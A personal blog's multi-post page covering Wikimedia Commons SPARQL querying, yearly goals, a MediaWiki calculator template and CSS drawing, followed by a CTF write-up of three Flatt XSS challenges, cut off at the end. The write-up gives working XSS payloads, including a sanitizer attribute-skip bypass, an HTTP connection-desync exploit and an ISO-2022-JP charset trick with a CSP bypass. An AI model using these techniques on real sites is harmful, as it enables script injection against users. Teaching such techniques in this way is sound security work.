Friday, February 28, 2025

Exploring structured data on commons

 Recently I've been helping Yaron do some SPARQL query optimization for his site Commons Walkabout.

It's a cool site. It lets you explore the media on Wikimedia Commons by filtering through various metadata fields.

For example - bodies of water located in a place that is in Ireland.
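
Under the hood, a filter like that presumably boils down to a SPARQL query along these lines (a rough sketch on my part; the exact properties the site uses are an assumption):

SELECT ?file WHERE {
  ?file wdt:P180 ?thing .                      # depicts
  SERVICE <https://query.wikidata.org/sparql> {
    ?thing wdt:P31/wdt:P279* wd:Q15324 ;       # an instance of (a subclass of) body of water
           wdt:P131+ wd:Q27 .                  # located (transitively) in Ireland
  }
} LIMIT 50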

It's addictive too. The media with the best-quality metadata tend to be the items donated by museums, which often means they are quite interesting.

An image the Commons Walkabout app showed me that I thought was pretty: Arabah desert in 1952, photographed by Benno Rothenberg

Structured data on Commons

As a result of helping with the optimization, I've been exploring structured (Wikidata-style) data on Commons.

The structured data project has been a bit controversial. I think there is a feeling in the community that the WMF abandoned the project at the 90% done point. It does mostly work, but there are still a lot of rough edges that make it less successful than it would otherwise be. Tools for authoring, interacting with, and maintaining the metadata are lacking, from what I understand. Most files are not described by metadata as well as they ought to be. Importantly, there is now a dual system of organization: the traditional free-text image description pages and category system, along with the newer structured metadata. Doing both means we're never fully committed to either.

Source: XKCD

The biggest criticism is the situation with the commons query service (See T297995 and T376979). Right now the service requires you to log in first. In the beginning this sounded like it would be a temporary restriction, but it now appears permanent.
 
Logging in is a big issue because it makes it impossible to build client-side apps that act as a front-end to the query service (it's not theoretically impossible, but the WMF's implementation of logging in doesn't support that). The auth implementation is not very user friendly, which is a significant hindrance, especially since many people who want to do queries aren't necessarily professional programmers (for example, the official instructions suggest using the browser dev console to look up the value of certain cookies as one of the steps to use the system). Some users have described the authentication system as such a hindrance that it makes more sense to shut the whole thing down than to keep it behind auth.

SPARQL is designed for a linked ecosystem where you can query remote databases. The auth system means the commons query service can't be used in federation: it can talk to other servers, but other servers cannot talk to it.

It's a bit hard to understand why WMF is doing this. Wikidata is fully open, and that is a much larger dataset of interest to a much broader group of people. If running Blazegraph is hard (which, don't get me wrong, I am sure it is), the Commons instance should be trivial compared to the Wikidata one. You can just look at the usage graphs, which clearly show almost nobody using the commons query service relative to the wikidata query service. The commons query service seems to average about 0 requests per minute, with occasional spikes up to 15-40 reqs/min. In comparison, the wikidata query service seems to average about 7500 reqs/minute.

I've heard various theories: that this is the beginning of an enshittification process so that Wikimedia can eventually sell access under the Wikimedia Enterprise banner, or that they don't want AI companies to scrape all the data (why an AI company would want to scrape this but not Wikidata, and why we would want to prevent them, I have no idea). Neither of these is really convincing to me.

I suspect the real reason is that WMF has largely cut funding to the structured data project. That just leaves a sysadmin team responsible for the Blazegraph query endpoint. Normally such a team would work in concert with another team more broadly responsible for SDC. With no such other team, the Blazegraph sysadmin team is very scared of being sucked into a position where suddenly they are solely responsible for things that should be outside their team's remit. They really don't want that to happen (hard to blame them), so they are putting the brakes on moving things forward with the commons query service.

This is just a guess. I don't know for sure what is happening or why, but that is the theory that makes the most sense to me.

The data model

Regardless of the above, the structured data project and SPARQL are really cool. I actually really like it.
 
While playing with it though, some parts do seem kind of weird to me.

Blank nodes for creator

The creator property says who created the image. Ideally the value is supposed to be a Q-number, but many creators don't have one.

The solution is to use a blank node. This makes sense: blank nodes in RDF are placeholders. They aren't equal to any other node, but they allow you to specify properties.

If the relationship chain was:

<sdc:Some image> <wdt:P170 (creator)> < blank node > <wdt:P4174 Wikimedia Username> "Some username"

That would be fine. However it's not. Instead, the statement is reified so that <wdt:P4174 Wikimedia Username> "Some username" is attached to the creator statement as a qualifier, instead of being a property of the blank node.
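
Concretely, that means querying for creators' usernames has to go through the statement node and its qualifier. A minimal sketch, assuming the standard Wikibase p:/ps:/pq: prefixes that the query service predeclares:

SELECT ?file ?username WHERE {
  ?file p:P170 ?creatorStatement .
  ?creatorStatement ps:P170 ?creator .      # usually a blank node ("somevalue")
  ?creatorStatement pq:P4174 ?username .    # Wikimedia username, as a qualifier
} LIMIT 10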

This feels so ontologically weird to me. It's kind of weird that we have to resort to such a hack for what is undoubtedly the main use case of this system.

Functionally dependent predicates

Some predicates functionally depend on the file in question. I feel like these should be added by the system. They should not be controlled or edited by the user.

For example P3575 data size. That's technical metadata. Users should not be responsible for inserting it. Users should not be able to change it. The fact that they are is a poor design in my opinion. Similarly for P2048 height, P2049 width, P1163 media type, P4092 checksum.

I find P1163 media type (aka the mime type of the file) especially weird. Why is this a string? Surely it should be the Q number of the file format in question if we're going to be manually filling it out?

The especially weird part is that some of this data is automatically added to the system in the schema namespace. The system automatically adds schema:contentSize, schema:encodingFormat, schema:height, schema:width and schema:numberOfPages, which are equivalent to some of these properties. So why are we duplicating them by hand (or by bot)?

At the same time, there seems to be a lot missing from schema. I don't see a sha1 hash (sha1 isn't the best hash since it is now broken, but it's the one MediaWiki uses internally for images). I'd love to see XMP file metadata included here as well, since it is already in RDF format.

The thing that is really missing (unless I missed it) is that it seems impossible to get the URL of the file description page, or even the MediaWiki page title, without string manipulation. This seems like a bizarre omission. I should be able to go from the canonical URL at Commons to the SDC item.

Querying the system

Querying the system can be a bit tricky sometimes because the data is usually spread between Commons and Wikidata, so you have to make use of SERVICE clauses to query the remote data, which can be slow.

The main trick seems to be to try and minimize the cross database communication. If you have a big dataset, try and minimize it before communicating with the remote database (or the label service).

Copious use of named subqueries (since the optimizer treats them as isolated units) can really help here.

If you are fetching distinct terms (or counts of distinct terms), ensuring that Blazegraph can use the distinct term optimization is very helpful. It seems like the Blazegraph query optimizer isn't very good and often cannot use this optimization even when it should. Making the group by very simple and putting it into a named subquery can help with this.
 
The distinct term optimization is critically important for running fast aggregation queries. Often it makes sense to first get the list of distinct terms you are interested in and their count (if applicable) in a named subquery, then go and fetch information for each item or filter them instead of doing it all in one group by.

If you have a slow query that involves any sort of group by, the first thing I would suggest is to try and extract a simple group by into a subquery (by simple I mean: only 1 basic graph pattern, no services, grouping by only 1 term, and either no aggregate functions or the only aggregate function being count(*)) and then use the results of that query as the basis of the rest of your query.
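
To make that concrete, here is a minimal sketch of the pattern (the choice of P275, copyright license, is purely illustrative, and WITH { ... } AS %name / INCLUDE is Blazegraph's named subquery syntax):

SELECT ?license ?licenseLabel ?files WITH {
  # Simple enough for the distinct term optimization: one triple pattern,
  # one grouping variable, count(*) only.
  SELECT ?license (COUNT(*) AS ?files) WHERE {
    ?file wdt:P275 ?license .
  } GROUP BY ?license
} AS %counts WHERE {
  INCLUDE %counts .
  # Only now talk to Wikidata, once per distinct license rather than once per file.
  SERVICE <https://query.wikidata.org/sparql> {
    ?license rdfs:label ?licenseLabel .
    FILTER( LANG( ?licenseLabel ) = "en" )
  }
} ORDER BY DESC(?files)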

If it's still too much, using the bd:sample service can be really helpful. This runs the query over a random subset of results instead of the whole thing. If you just want to get the broad trends, this can often be good enough.

The most complicated thing to query seems to be the P170 creator predicate. There are 72 million items with that predicate, and the vast majority are blank nodes, so the number of distinct terms is in the millions (even files with the same creator are considered distinct if the creator is a blank node). Queries involving it seem to almost always time out.
 
Initially I thought the best that could be done was sampling and interpolating. For example, this query that gives you the top creators (who have Q numbers). The numbers aren't exactly right, but they seem to be within the right order of magnitude.

Unfortunately filtering via wikibase:isSomeValue() is very slow, so we can't just filter out the blank nodes. I did find a hack though. In general Blazegraph arranges blank nodes at the end of the result set (or at least, it seems to in this case). If you do a subquery of distinct terms with a limit of about 10,000 you can get all the non-blank nodes (since there are only about 7200 of them and they are at the beginning). This is hacky since you can't use range queries with URI values, and you can't even put an order by on the query or it will slow down, so you just have to trust that Blazegraph is consistently returning things in the order you want even though it is by no means required to. It seems to work. For example, here is an example table using this method counting the number of images created by creators (with Q numbers) grouped by their cause of death. A bit morbid, but it is fascinating that you can make such an arbitrary query.
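
Roughly, the trick looks like this (a sketch that leans on observed rather than guaranteed Blazegraph behaviour; the cause-of-death join is left out for brevity):

SELECT ?creator (COUNT(?file) AS ?images) WITH {
  # Distinct creators, capped: Blazegraph happens to return the ~7,200 Q-item
  # creators before the millions of blank nodes, so the limit catches them all.
  SELECT DISTINCT ?creator WHERE {
    ?file wdt:P170 ?creator .
  } LIMIT 10000
} AS %creators WHERE {
  INCLUDE %creators .
  # isSomeValue() is cheap on 10,000 rows, even though it times out on 72 million.
  FILTER( !wikibase:isSomeValue( ?creator ) )
  ?file wdt:P170 ?creator .
} GROUP BY ?creator
ORDER BY DESC(?images)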

Conclusion

Anyways, I do find RDF and SPARQL really cool, so it's been fun poking around in Commons' implementation of it. Check out Yaron's site https://commonswalkabout.org/; it is really cool.


Thursday, January 30, 2025

Happy (belated) new year

I was going to write a new year's post. Suddenly it's almost February.

Last year I had the goal of writing at least 1 blog post a month.

 I was inspired by Tyler Cipriani who wrote a post talking about his goal of writing at least once a month. It seemed like a reasonable goal to help practice writing. I've often wanted to maintain a blog in the past, but would always find I petered out after a few posts. So last year I set myself the goal of at least once a month.

How'd I do?

Ok I guess. I wrote 9 blog posts last year. Short of my goal of 12, but still not terrible. Looking back, I realize that I wrote 9 in 2023 and 11 in 2022, so I guess the goal didn't actually increase my writing. Nonetheless I'm still pretty happy that I was writing posts throughout the year.

Based on blogger's internal analytics, it seems like people like it when I do CTF writeups. For some unclear reason my post about MUDCon got a tremendous number of views relative to my other posts. However, the real goal is more to practice writing than to get views, so I suppose it doesn't matter much. That said, I do write the CTF writeups in the hope that others can learn from them, so it is nice to see that people read them.

On to the next one. Maybe this year I'll actually make it to once a month - I'd like to keep going with this goal. I think I'll try to write more short, off-the-cuff things (like this) and fewer big technical posts.

This year

It's already been a month and I've already mostly forgotten about my goals. But I did write some down.

I want this to be a year of trying new things. I want to try and branch out to new and different things.

I want to explore my creative side a bit more. To be clear, I do think there is a lot of creativity in computer programming, but I also want to try more traditionally creative things. Paint some pictures! I've been taking a beginner acrylic painting class at the local community center, which has been great so far. Maybe I should try and join the two interests and make a silly computer game.

I'd also like to explore different computer things. I've been doing MediaWiki stuff for a while now, but I don't want that to be the only thing I ever do. I'd like to try and direct my open source contributions towards things I haven't done before. Maybe things that are more low level than PHP web apps. Perhaps I should learn Rust! I'd like to work on stuff where I feel like I'm learning, and I think it would be cool to spend some time learning more about traditional CS concepts (algorithms and whatnot). It's been a long time since I was in university learning about that sort of thing. Maybe it would be fun to brush up. In my current programming work it's very rare for that sort of thing to be relevant.

Where I do keep up with open source contributions in the MediaWiki/Wikimedia sphere of influence, I want to work on things that are unique or new. Things that, whether they are good or bad ideas, at least open up new possibilities for discussion. I can't help but feel that MediaWiki land has been a little stagnant. So many of the core ideas are from the late 2000s. They've been incrementally improved upon, but there really isn't anything new, both in Wikimedia land and in third-party MediaWiki land. Perhaps that is just a sign of a maturing ecosystem, but I think it's time to try some crazy new ideas. Some will work and some will fail, but I want to feel like I'm working on something new that makes people think of the possibilities, not just improving what is already there (not that there is anything wrong with that; maintenance is critical and underappreciated, it's just not what I want to work on right now, at least not as a volunteer).

I think I've gotten a start in that direction with the calculator project that WikiProject Med funded me to do. It spurred a lot of interesting discussion and ideas, which is the sort of thing I want to be involved with.

Maybe I'll explore Wikidata a bit more. I always found RDF databases kind of interesting.

On the third-party MW side, I've felt for a long time that we could use some different ideas for querying and reporting in MediaWiki (Cargo and SMW are cool, but I don't think they quite make the right trade-offs). I'd love to explore ideas in that space a little bit.

So in conclusion, what are the yearly goals?

  • I think I want to be a little more intentional in planning out my life
  • I want my open source MediaWiki contribs to be more along the lines of prototyping new and unique ideas. I want to avoid being sucked into just fixing things at Wikimedia (After all, that's why WMF allegedly has paid staff).
  • I want to try and pursue creative hobbies outside of computer programming.
  • I want to try and do more programming outside of my MediaWiki comfort zone.

See you back here this time next year to see how I did.


Thursday, January 16, 2025

Signpost article on {{Calculator}}

 The most recent issue of the Wikipedia Signpost published an article I wrote about the {{calculator}} series of templates, which I worked on.

The Signpost is Wikipedia's internal newspaper. I read it all the time. It's really cool to have contributed something to it.

So what's this all about?

Essentially I was hired by Wiki Project Med to make a script to add medical calculators to their wiki, MDWiki. For example, you might have a calculator to calculate BMI, where the reader enters their weight and height. After being used on MDWiki, the script made its way to Wikipedia.

 The goal of this was to make something user programmable, so that users could solve their own problems without having to wait on developers. The model we settled on was a spreadsheet-esque one. You can define cells that readers can write in, and you can define other cells that update based on some formula.

Later we also allowed manipulating CSS, to provide more interactivity. This opened up a surprising number of opportunities, such as interactive diagrams and demonstrations.

See the Signpost article for more details: https://en.wikipedia.org/wiki/Wikipedia:Wikipedia_Signpost/2025-01-15/Technology_report and let me know what you think.

Tuesday, December 31, 2024

Drawing with CSS in MediaWiki

One thing you aren't allowed to do when writing pages in MediaWiki is use SVG elements.

You can include SVG files, but you can't dynamically draw something based on the contents of the page.

There are two schools of thought on adding features to MediaWiki page formatting.

Some people think we should give users low level tools and let them figure it out. An example (in my opinion) of this is Scribunto (Lua support). This lets editors create small scripts in the Lua programming language as macros. It's fairly low level - learning to program is complicated. However, it gives users ultimate flexibility, and only a few users need to learn how to make Lua scripts. The other users can just use them without understanding how they work.

The other school of thought is to give users high level tools. For example, the upcoming Charts extension or the older EasyTimeline extension. This gives users some flexibility, but many of the details are hidden. The lack of flexibility sounds like a downside, but there are some benefits. It's easier to ensure everything is consistent when it's managed by the system instead of the user. It's easier to ensure everything meets performance requirements, accessibility requirements, etc. It's easier to ensure there is alternative content where the rich content can't be supported (e.g. perhaps in some app).

I tend to lean towards the former, as I think the extra flexibility spurs creativity. Users will take the tools and use them in ways you never imagined, which I think is a good thing (not to mention more scalable), but I understand where the other side is coming from.

One of the limitations of MediaWiki is that a template author can't really draw things dynamically. Sure, they can use uploaded images and fancy HTML, but they can't use true server-side dynamically generated graphics, because SVG elements aren't allowed in wikitext. Sometimes people use quite ingenious HTML hacks to get around this - e.g. {{Pie chart}} uses CSS borders to make pie graphs. For the most part though, this niche is filled by high level extensions like the former Graph extension or the upcoming Charts extension, which let users insert a graph based on some specification. This is great if the graph the extension generates is what the user needs, but what if their requirements differ slightly?

Personally I think we should just do both - let users have at it with SVG, while also providing the fancier high level extensions. See what they like best. (Some people argue against embedded SVG on security grounds, but it's really no different from HTML. You just need to whitelist safe elements/attributes and not allow risky stuff.)

Modern CSS

Recently though, I realized that CSS has advanced a lot, and you don't really need SVG to do drawings. You can do it in pure CSS.

CSS has a property called "clip-path". This allows specifying a clipping path in SVG path syntax. Only the parts inside the path show through.

SVG path syntax is essentially how to tell the computer, go to this point, draw a line to this point, from there make a curve to some other point, and so on and so forth. Essentially instructing the computer how to draw a picture.

This allows drawing a lot of stuff you would normally need SVG for. To be sure, there are a lot of other things SVGs do, but at its core, this is the main drawing part.

Here is an example of a smiley face and the word Example in fancy writing (taken from [[File:Example.svg]]) in pure CSS

In fact, I made a start on an implementation of the canvas API in Lua using this as the output mode: https://en.wikipedia.org/wiki/Module:Sandbox/Bawolff/canvas

Limitations

A big limitation is lack of stroking. The clip-path thing works great for filling regions, but it doesn't work for stroking paths.

When drawing, to stroke means to draw an outline, whereas to fill means you draw a shape and fill everything inside of it.

This doesn't seem insurmountable though. Most actual rasterization software works by flattening curved paths to lines, we could do the same thing in Lua, although it might not be the most efficient solution in terms of outputted markup.

Much of the time, I was actually surprised by how much of the Canvas spec has CSS equivalents. Even obscure stuff: what interpolation do you want for rendered images? CSS has the image-rendering property for that.

There are some things with no equivalent. We can't do anything that depends on the client side, can't get font metrics, can't get the pixel data of an image, etc. Centering text the way canvas does it actually seems kind of hard. Composition operators are mostly not supported. Blending operators can be, but won't work properly with images. A bunch of other small things aren't supported, mostly involving more complex aspects of text layout.

On the whole though, I'm shocked at how far I got and how much of the stuff I don't have yet seems like a simple matter of programming.

There is also the possibility of limited interactivity with this, using :hover CSS and CSS animations (although transitioning paths probably doesn't work great, it seems possible in theory). Possibly even combined with {{calculator}} to allow limited interaction via form controls.

Try out [[Module:Sandbox/Bawolff/canvas]] if you are curious.

Sunday, December 1, 2024

Writeup for the flatt XSS challenge

This November, the company Flatt put out three XSS challenges - https://challenge-xss.quiz.flatt.training/ ( source code at https://github.com/flatt-jp/flatt-xss-challenges )

These were quite challenging and I had a good time solving them. The code for all of my solutions is at http://bawolff.net/flatt-xss-challenge.htm. Here is how I solved them.

Challenge 1 (hamayan)

This was, in my opinion, the easiest challenge.

The setup is as follows - We can submit a message. On the server side we have:

  const sanitized = DOMPurify.sanitize(message);
  res.view("/index.ejs", { sanitized: sanitized });

with the following template:

    <p class="message"><%- sanitized %></b></p>
    <form method="get" action="">
        <textarea name="message"><%- sanitized %></textarea>
        <p>
            <input type="submit" value="View 👀" formaction="/" />
        </p>
    </form>

As you can see, the message is sanitized and then used in two places - in normal HTML but also inside a <textarea>.

The <textarea> tag is not a normal HTML tag. It has a "text" content model. This means that HTML inside it is not interpreted and the normal HTML rules don't apply.

Consider the following HTML as our message: <div title="</textarea><img src=x onerror=alert(origin)>">

In a normal HTML context, this is fairly innocuous. It is a div with a title attribute. The title attribute looks like HTML, but it is just a title attribute.

However, if we put it inside a <textarea>, it gets interpreted totally differently. There are no elements inside a textarea, so there are no attributes. The </textarea> thus closes the textarea tag instead of being a harmless attribute:

<textarea><div title="</textarea><img src=x onerror=alert(origin)>">

Thus, once the textarea tag gets closed, the <img> tag is free to execute.

https://challenge-hamayan.quiz.flatt.training/?message=%3Cdiv%20title=%22%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(origin)%3E%22%3E

Challenge 2 (Ryotak)

This challenge was probably the hardest for me.

The client-side setup

We have a website. You can enter some HTML and save it. Once saved, you are given an id number in the url, the HTML is fetched from the server, it is sanitized and then set to the innerHTML of a div.

The client-side sanitization is as follows:

        const SANITIZER_CONFIG = {
            DANGEROUS_TAGS: [
                'script',
                'iframe',
                'style',
                'object',
                'embed',
                'meta',
                'link',
                'base',
                'frame',
                'frameset',
                'svg',
                'math',
                'template',
            ],

            ALLOW_ATTRIBUTES: false
        }

        function sanitizeHtml(html) {
            const doc = new DOMParser().parseFromString(html, "text/html");
            const nodeIterator = doc.createNodeIterator(doc, NodeFilter.SHOW_ELEMENT);

            while (nodeIterator.nextNode()) {
                const currentNode = nodeIterator.referenceNode;
                if (typeof currentNode.nodeName !== "string" || !(currentNode.attributes instanceof NamedNodeMap) || typeof currentNode.remove !== "function" || typeof currentNode.removeAttribute !== "function") {
                    console.warn("DOM Clobbering detected!");
                    return "";
                }
                if (SANITIZER_CONFIG.DANGEROUS_TAGS.includes(currentNode.nodeName.toLowerCase())) {
                    currentNode.remove();
                } else if (!SANITIZER_CONFIG.ALLOW_ATTRIBUTES && currentNode.attributes) {
                    for (const attribute of currentNode.attributes) {
                        currentNode.removeAttribute(attribute.name);
                    }
                }
            }

            return doc.body.innerHTML;
        }

If that wasn't bad enough, there is also server-side sanitization, which I'll get to in a bit.

Client side bypass

This looks pretty bad. It disallows all attributes. It disallows <script>, which you more or less need to do anything interesting if you don't have event attributes. It disallows <math> and <svg>, which most mXSS attacks rely on.

However there is a mistake:

        for (const attribute of currentNode.attributes) {
              currentNode.removeAttribute(attribute.name);
        }

Which should be:

        for (const attribute of Array.from(currentNode.attributes)) {
              currentNode.removeAttribute(attribute.name);
        } 

The attributes property is a NamedNodeMap. This is a live collection that is connected to the DOM. This means that if you remove the first attribute, it is instantly deleted from this list, with the second attribute becoming the first, and so on.

This is problematic if you modify the attributes while iterating through them in a loop. If you remove an attribute in the first iteration, the second attribute then becomes the first. The next iteration then goes to the current second attribute (previously the third). As a result, what was originally the second attribute gets skipped.

In essence, the code only removes odd attributes. Thus <video/x/onloadstart=alert(origin)><source> will have only the x removed, and continue to trigger the XSS.

For reasons that will be explained later, it is important that our exploit does not have any whitespace in it. An alternative exploit might be <img/x/src/y/onerror=alert(origin)>

The server-side part

That's all well and good, but the really tricky part of this challenge is the server side part.

        elif path == "/api/drafts":
            draft_id = query.get('id', [''])[0]
            if draft_id in drafts:
                escaped = html.escape(drafts[draft_id])
                self.send_response(200)
                self.send_data(self.content_type_text, bytes(escaped, 'utf-8'))
            else:
                self.send_response(200)
                self.send_data(self.content_type_text, b'')
        else:
            self.send_response(404)
            self.send_data(self.content_type_text, bytes('Path %s not found' % self.path, 'utf-8'))

As you can see, the server side component HTML-escapes its input.

This looks pretty impossible. How can you have XSS without < or >?

My first thought was maybe something to do with charset shenanigans. However this turned out to be impossible since everything is explicitly labelled UTF-8 and the injected HTML is injected via innerHTML so takes the current document's charset.

I also noticed that we could put arbitrary text into the 404 error page. The error page is served as text/plain, so it would not normally be exploitable. However, the JS that loads the html snippet uses fetch() without checking the returned content type. I thought perhaps there would be some way to make it fetch the wrong page and use the 404 result as the html snippet.

My first thought was maybe there is a difference in path handling between Python's urllib and the WHATWG URL spec. There are in fact lots of differences, but none that seemed exploitable. There was also no way to inject a <base> tag or anything like that. Last of all, the fetch URL starts with a /, so it's always going to be relative just to the host and not the current path.

I was stuck here for quite a long time.

Eventually I looked at the rest of the script. There are some odd things about it. First of all, it is using python's BaseHTTPRequestHandler as the HTTP server. The docs for that say in giant letters: "Warning: http.server is not recommended for production. It only implements basic security checks.". Sounds promising.

I also couldn't help but notice that this challenge was unique compared to the others - it was the only one hosted on an IP address with just plain HTTP/1.1 and no TLS. The other two were under the .quiz.flatt.training domain, HTTP/2 and presumably behind some sort of load balancer.

All signs pointed to something being up with the HTTP implementation.

Poking around the BaseHTTPRequestHandler, I found the following in a code comment: "IT IS IMPORTANT TO ADHERE TO THE PROTOCOL FOR WRITING!". All caps, must be important.

Let's take another look at the challenge script. Here is the POST handler:

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length'))
        if content_length > 100:
            self.send_response(413)
            self.send_data(self.content_type_text, b'Post is too large')
            return
        body = self.rfile.read(content_length)
        draft_id = str(uuid4())
        drafts[draft_id] = body.decode('utf-8')
        self.send_response(200)
        self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))

    def send_data(self, content_type, body):
        self.send_header('Content-Type', content_type)
        self.send_header('Connection', 'keep-alive')
        self.send_header('Content-Length', len(body))
        self.end_headers()
        self.wfile.write(body)


Admittedly, it took me several days to see this, but there is an HTTP protocol violation here.

The BaseHTTPRequestHandler class supports HTTP Keep-alive. This means that connections can be reused after the request is finished. This improves performance by not having to repeat a bunch of handshake steps for every request. The way this works is if the web server is willing to keep listening for more requests on a connection, it will set the Connection: Keep-Alive header. The challenge script always does this.

The problem happens during the case where a POST request has too large a body. The challenge script will return a 413 error if the POST request is too large. This is all fine and good. 413 is the correct error for such a situation. However it immediately returns after this, not reading the POST body at all, leaving it still in the connection buffer. Since the Connection: Keep-alive header is set, the python HTTP server class thinks the connection can be reused, and waits for more data. Since there is still data left in the connection buffer, it gets that data immediately, incorrectly assuming it is the start of a new request. (This type of issue is often called "client-side desync")

What the challenge script should do here is read Content-Length number of bytes and discard them, removing them from the connection buffer, before handing the connection off to the base class to wait for the next request. Alternatively, it could set the Connection: Close header, to signal that the connection can no longer be reused (this wouldn't be enough in and of itself, but the python base class looks for this). By responding without looking at the POST body, the challenge script desynchronizes the HTTP connection. The server thinks we are waiting on the next request, but the web browser is still in the middle of sending the current request.

To summarize, this means that if we send a large POST request, the web server will treat it as two separate requests instead of a single request.

We can use this to poison the connection. We send something that will be treated as two requests. When the browser sends its next request, the web server responds with part two of our first request, thus causing the web browser to think the answer to its second request is the answer to part two of the first request.

The steps of our attack would be as follows:

  • Open a window to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63 (The specific draft_id doesn't matter as long as its consistent). This will ensure that the page is in cache, as we don't want it to be fetched in the middle of our attack. Note that this page is sent with a Cache-Control: max-age=3600 header, while most other requests do not have this header.
  • Make a long POST request that has a POST body that looks something like GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\nhost:f\r\n;x-junk1: PADDING..  (This is why our payload cannot have whitespace, it would break the HTTP request which is whitespace delimited)
  • Navigate to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63. Because we preloaded this and it is cachable, it should already be in cache. The web browser will load it from disk, not the network. The javascript on this page will fetch the document with that draft_id in the url via fetch(). This response does not have a caching header, so the web browser makes a new request on the network. Since half of the previous POST is still in the connection buffer, the webserver responds to that request instead of the one the browser just made. The result is a 404 page containing our payload. The web browser sees that response, and incorrectly assumes it is for the request it just made via fetch(). It is sent with a text/plain content type and 404 status code, but the javascript does not care.

The only tricky part left is how to send a POST with such fine-grained control over the body.

HTML forms have a little known feature where they can be set to send in text/plain mode. This works perfectly for us. Thus we have a form like:

<form method="POST" target="ryotak" enctype="text/plain" action="http://34.171.202.118/" id="ryotakform">
<input type="hidden"
name="GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1&#xd;&#xa;host:f&#xd;&#xa;x-junk1: aaaaaaaaaaaaaaaaaaaaaa..." value="aa">
</form>

 The rest of the exploit looks like:

    window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
    setTimeout( function () {
        document.getElementById( 'ryotakform' ).submit();
        setTimeout( function () {
            window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
        }, 500 );
    }, 5000 );

The timeouts are to ensure that the web browser has enough time to load the page before going to the next step.

You can try it out at http://bawolff.net/flatt-xss-challenge.htm

Challenge 3 (kinugawa)

Note: My solution works on Chrome but not Firefox.

The Setup 

  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy"
    content="default-src 'none';script-src 'sha256-EojffqsgrDqc3mLbzy899xGTZN4StqzlstcSYu24doI=' cdnjs.cloudflare.com; style-src 'unsafe-inline'; frame-src blob:">

<iframe name="iframe" style="width: 80%;height:200px"></iframe>

[...]

      const sanitizedHtml = DOMPurify.sanitize(html, { ALLOWED_ATTR: [], ALLOW_ARIA_ATTR: false, ALLOW_DATA_ATTR: false });
      const blob = new Blob([sanitizedHtml], { "type": "text/html" });
      const blobURL = URL.createObjectURL(blob);
      input.value = sanitizedHtml;
      window.open(blobURL, "iframe");
 

We are given a page which takes some HTML, puts it through DOMPurify, turns it into a blob url then navigates an iframe to that blob.

Additionally there is a CSP policy limiting which scripts we can run.

The solution

The CSP policy is the easiest part. cdnjs.cloudflare.com is on the allow list which contains many js packages which are unsafe to use with CSP. We can use libraries like angular to bypass this restriction.

For the rest - we're obviously not going to find a 0-day in DOMPurify. If I did, I certainly would have led the blog post with that.

However, since blob urls are separate documents, that means that they are parsed as a fresh HTML document. This includes charset detection (Since the mime type of the Blob is set to just text/html not text/html; charset=UTF-8). DOMPurify on the other hand is going to assume that the input byte stream does not need any character set related conversions.

So in principle, what we need to do here is create a polygot document. A document that is safe without any charset conversions applied, but becomes dangerous when interpreted under a non-standard character set. Additionally we then need to get the blob url interpreted as that character set.

There are a small number of character sets interpreted by web browsers. There used to be quite a lot of dangerous ones to choose from, such as UTF-7 or HZ. However most of these got removed, and the only remaining charset that is easy to make dangerous is ISO-2022-JP.

The reason that ISO-2022-JP is so useful in exploits is that it is modal. It is actually 4 character sets in one, with a special code to change between them. If you write "^[$B" it switches to Japanese mode. "^[(B" on the other hand switches to ASCII mode. (^[ refers to ASCII character 0x1B, the escape character. You might also see it written as \x1B, %1B, ESC or \e). If we are already in the mode that the escape sequence switches to, then the character sequence does nothing and it is removed from the byte stream.

This means that <^[(B/style> will close a style tag when the document is in ISO-2022-JP mode, but is considered non-sense in UTF-8 mode.

Thus we might have a payload that looks like the following (remembering that ^[ stands for the ASCII ESC character):

<style> <^[(B/style>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><^[(B/script>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'>
  <^[(B/script>
  <^[(Bdiv ng-app ng-csp>
    {{$on.curry.call().alert($on.curry.call().origin)}}
  <^[(B/div>
</style>

DOMPurify won't see <^[(B/style> as a closing style tag and thinks the whole thing is the body of the style tag. To prevent mXSS, DOMPurify won't allow things that look like html tags (a "<" followed by a letter) inside <style> tags, so those are also broken up with ^[(B. A browser interpreting this as ISO-2022-JP would simply not see the "^[(B" sequences and treat it as normal HTML.

Now all we need to do is to convince the web browser that this page should be considered ISO-2022-JP.

The easiest way of doing that would be with a <meta charset="ISO-2022-JP"> tag. Unfortunately DOMPurify does not allow meta tags through. Even if it did, this challenge configures DOMPurify to ban all attributes. (We can't use the ^[(B trick here, because it only works after the document is already in ISO-2022-JP mode).

Normally we could use detection heuristics. In most browsers, if a document does not have a charset in its content type nor a meta tag, the web browser just makes a guess based on its textual content of the beginning of the document. If the browser sees a bunch of ^[ characters used in a way that would be valid in ISO-2022-JP and no characters that would be invalid in that encoding (such as multibyte UTF-8 characters), it knows that this document is likely ISO-2022-JP, so guesses that as the charset of the document.

However this detection method is used as a method of last resort. In the case of an iframe document (which does not have a better method such as a charset in the mime type or a meta tag), the browser will use the parent window's charset, instead of guessing based on document contents.

Since this parent document uses UTF-8, this stops us.

However, what if we didn't use an iframe?

The challenge navigates the iframe by using its name. What if there was another window with the same name? Could we get that window to be navigated instead of the iframe?

If we use window.open() to open the challenge in a window named "iframe", then the challenge would navigate itself instead of the iframe. The blob is now a top-level navigation, so cannot take its charset from the parent window. Instead the browser has no choice but to look at the document contents as a heuristic, which we can control.

The end result is something along the lines of:

window.open( 'https://challenge-kinugawa.quiz.flatt.training/?html=' +
